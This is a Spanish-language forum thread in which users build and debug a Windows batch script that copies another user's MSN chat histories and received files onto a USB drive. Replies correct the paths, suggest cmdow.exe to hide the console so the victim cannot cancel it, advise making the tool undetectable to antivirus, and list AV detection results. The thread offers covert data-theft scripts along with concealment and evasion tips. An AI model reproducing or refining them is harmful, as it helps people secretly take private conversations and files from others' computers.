llevo muxo tiempo viendo este foro pero nunca me e decidido a escribir nada hasta hoy jajaj.
pues teng una peqeña dudita. este code se supone q haria copiar las conver del msn al pendrive pero creo q le falta muxo no?
el code lo saque de el foro.elhacker.

ayudita plis

Código: Seleccionar todo

@echo off
    if exist C:\Documents and Settings\%username%\Mis documentos\Mis archivos recibidos\*.* goto msn | C:\Users\%username%\Mis documentos\Mis archivos recibidos\*.*
    if exist C:\Documents and Settings\%username%\Mis documentos\Mis historiales de conversaci¢n\*.* goto msnplus | C:\users\%username%\Mis documentos\Mis historiales de conversaci¢n\*.*
    goto fin
    :msn
    xcopy C:\Documents and Settings\%username%\Mis documentos\Mis archivos recibidos\*.* %cargado%:\FPs\ /S /C /Q
    xcopy C:\Users\%username%\Mis documentos\Mis archivos recibidos\*.* %cargado%:\FPs\ /S /C /Q
    :msnplus
    xcopy C:\Documents and Settings\%username%\Mis documentos\Mis historiales de conversaci¢n\*.* %cargado%:\FPs\ /S /C /Q 
    xcopy C:\Users\%username%\Mis documentos\Mis historiales de conversaci¢n\*.* %cargado%:\FPs\ /S /C /Q 
    :fin
    pause
no creo que funcione por dos motivos
1º -Puede que no tenga el S.O en C sino en D por l cual lo mejor seria utilizar vakriables de entorno
2º -Para utilizar una ruta con espacios hay que poner la ruta entre dobles comillas
y creo que nada mas
Este bat copiaria los archivos de las carpetas "Mis historiales de conversación" y "Mis archivos recibidos" al directorio donde esta el *.bat

@echo off
set destino=%cd%
cd \
if exist %USERPROFILE%\MISDOC~1\MISARC~1\*.*
copy "%USERPROFILE%\MISDOC~1\MISARC~1\*.*" "%destino%\*.*"

if exist %USERPROFILE%\MISDOC~1\MISHIS~1\*.*
copy "%USERPROFILE%\MISDOC~1\MISHIS~1\*.*" "%destino%\*.*"
Utilizando cmdow.exe podrias ocultarlo.

http://www.commandline.co.uk/
cmdow @ /HID = Ocultar la ventana de comandos durante la ejecución de un fichero bath (y eliminar por tanto la posibilidad de cancelarlo por el usuario).

cmdow @ /HID
@echo off
set destino=%cd%
cd \
if exist %USERPROFILE%\MISDOC~1\MISARC~1\*.*
copy "%USERPROFILE%\MISDOC~1\MISARC~1\*.*" "%destino%\*.*"

if exist %USERPROFILE%\MISDOC~1\MISHIS~1\*.*
copy "%USERPROFILE%\MISDOC~1\MISHIS~1\*.*" "%destino%\*.*"
Claro que el cmdow.exe si no quieres que el antivirus lo detecte tendrías que hacerlo indetectable.

Asquared | Riskware.RiskTool.Win32.HideWindows!IK
Avast | No encontrado virus
Avira | No encontrado virus
BitDefender| No encontrado virus
ClamWin | No encontrado virus
DrWeb | No encontrado virus
FProt | No encontrado virus
Ikarus | not-a-virus:RiskTool.Win32.HideWindows
KAV | not-a-virus:RiskTool.Win32.HideWindows
McAfee | Tool-HideWindow
NOD32 v2 | No encontrado virus
Norman | No encontrado virus